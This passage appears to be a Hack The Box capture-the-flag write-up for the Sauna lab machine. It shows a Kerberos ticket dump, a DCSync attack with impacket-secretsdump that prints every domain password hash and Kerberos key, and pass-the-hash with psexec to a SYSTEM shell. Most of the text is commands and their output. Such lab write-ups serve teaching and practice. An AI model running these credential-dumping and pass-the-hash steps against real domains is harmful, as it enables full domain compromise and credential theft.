Avp8e/u6PL7e7IUjABvaGqvMfBOyFL7/dFeON3LOEhEeWmJ+m8WjgfIwge+gAwIBAKKB5wSB5H2B4TCB3qCB2zCB2DCB1aAbMBmgAwIBF6ESBBAHI36FeaiAD3wWtMy67xvkoRgbFkVHT1RJU1RJQ0FMLUJBTksuTE9DQUyiEzARoAMCAQGhCjAIGwZmc21pdGijBwMFAEDhAAClERgPMjAyNjA0MzAxNDA4MzBaphEYDzIwMjYwNTAxMDAwODMwWqcRGA8yMDI2MDUwNzE0MDgzMFqoGBsWRUdPVElTVElDQUwtQkFOSy5MT0NBTKkrMCmgAwIBAqEiMCAbBmtyYnRndBsWRUdPVElTVElDQUwtQkFOSy5MT0NBTA==

  ServiceName              :  krbtgt/EGOTISTICAL-BANK.LOCAL
  ServiceRealm             :  EGOTISTICAL-BANK.LOCAL
  UserName                 :  fsmith
  UserRealm                :  EGOTISTICAL-BANK.LOCAL
  StartTime                :  4/30/2026 7:08:30 AM
  EndTime                  :  4/30/2026 5:08:30 PM
  RenewTill                :  5/7/2026 7:08:30 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  ByN+hXmogA98FrTMuu8b5A==
  ASREP (key)              :  58A52D36C84FB7F5F1BEAB9A201DB1DD

*Evil-WinRM* PS C:\Users\FSmith\Documents>

不在这里浪费时间了,直接secretsdump执行dsync攻击

1
impacket-secretsdump -dc-ip 10.129.95.180 'EGOTISTICAL-BANK.LOCAL/svc_loanmgr:Moneymakestheworldgoround!@10.129.95.180'
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
┌─[root@htb-hlx1pljzsg]─[/home/skyarrow/Desktop]
└──╼ #impacket-secretsdump -dc-ip 10.129.95.180 EGOTISTICAL-BANK.LOCAL/svc_loanmgr:Moneymakestheworldgoround\!@10.129.95.180
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:7b0133989569a3966019b179f44c089c:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:4eb1a9dac3cfba016326537d73846e773199dc3dc3bd5c0d9000eddc0afdead3
SAUNA$:aes128-cts-hmac-sha1-96:01da32b8605ccbe020cc269dfa58e1e5
SAUNA$:des-cbc-md5:104c515b86739e08
[*] Cleaning up... 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌─[root@htb-hlx1pljzsg]─[/home/skyarrow/Desktop]
└──╼ #impacket-psexec EGOTISTICAL-BANK.LOCAL/administrator@10.129.95.180 -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on 10.129.95.180.....
[*] Found writable share ADMIN$
[*] Uploading file ofuoFiAQ.exe
[*] Opening SVCManager on 10.129.95.180.....
[*] Creating service crdP on 10.129.95.180.....
[*] Starting service crdP.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> 
C:\Windows\system32> type c:\users\administrator\desktop\root.txt
56b9ce82a467af9d7bd8638c62af7869

#HTB
HackTheBox-Sauna
http://example.com/2026/04/30/HackTheBox-Sauna/
Author
Skyarrow
Posted on
April 30, 2026
Licensed under